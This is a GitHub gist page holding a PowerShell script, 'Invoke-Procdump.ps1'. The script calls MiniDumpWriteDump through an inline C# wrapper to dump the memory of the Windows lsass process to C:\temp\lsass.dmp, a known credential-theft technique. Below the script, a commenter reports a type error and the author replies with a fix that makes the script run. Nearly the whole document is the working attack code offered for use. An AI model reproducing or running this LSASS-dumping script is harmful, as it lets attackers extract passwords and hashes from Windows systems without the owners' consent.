Skip to content

Instantly share code, notes, and snippets.

@dmaasland

dmaasland/Invoke-Procdump.ps1

Created November 27, 2019 12:28
Show Gist options
  • Star 17 You must be signed in to star a gist
  • Fork 5 You must be signed in to fork a gist
  • Save dmaasland/b8a1e66a14d448ec5a28640e2e2a1605 to your computer and use it in GitHub Desktop.
Save dmaasland/b8a1e66a14d448ec5a28640e2e2a1605 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Invoke-Procdump.ps1
$Source = @"
using System;
using System.Runtime.InteropServices;
namespace ProcDump {
public static class DbgHelp {
[DllImport("Dbghelp.dll")]
public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, IntPtr hFile, IntPtr DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
}
}
"@
If (-Not "ProcDump" -as [Type]) {
Add-Type -TypeDefinition $Source
}
$Process = [System.Diagnostics.Process]::GetProcessesByName("lsass")
$DumpPath = "C:\temp\$($Process.Name).dmp"
$DumpStream = [System.IO.FileStream]::new($DumpPath, [System.IO.FileMode]::Create)
$DumpType = [IntPtr]::new(2)
$Dump = [ProcDump.DbgHelp]::MiniDumpWriteDump($Process.Handle, $Process.Id, $DumpStream.Handle, $DumpType, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)
$DumpStream.Dispose()
@xsuperbug
Copy link

xsuperbug commented Dec 3, 2019
edited

Hi, I tested it on Win10 x64 but I got an error like

Unable to find type [ProcDump.DbgHelp].
At C:\procdump.ps1:22 char:9
+ $Dump = [ProcDump.DbgHelp]::MiniDumpWriteDump($Process.Handle, $Proce ...
+         ~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (ProcDump.DbgHelp:TypeName) [], RuntimeException
    + FullyQualifiedErrorId : TypeNotFound

@dmaasland
Copy link
Author

Remove the "If" surrounding line 14 :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment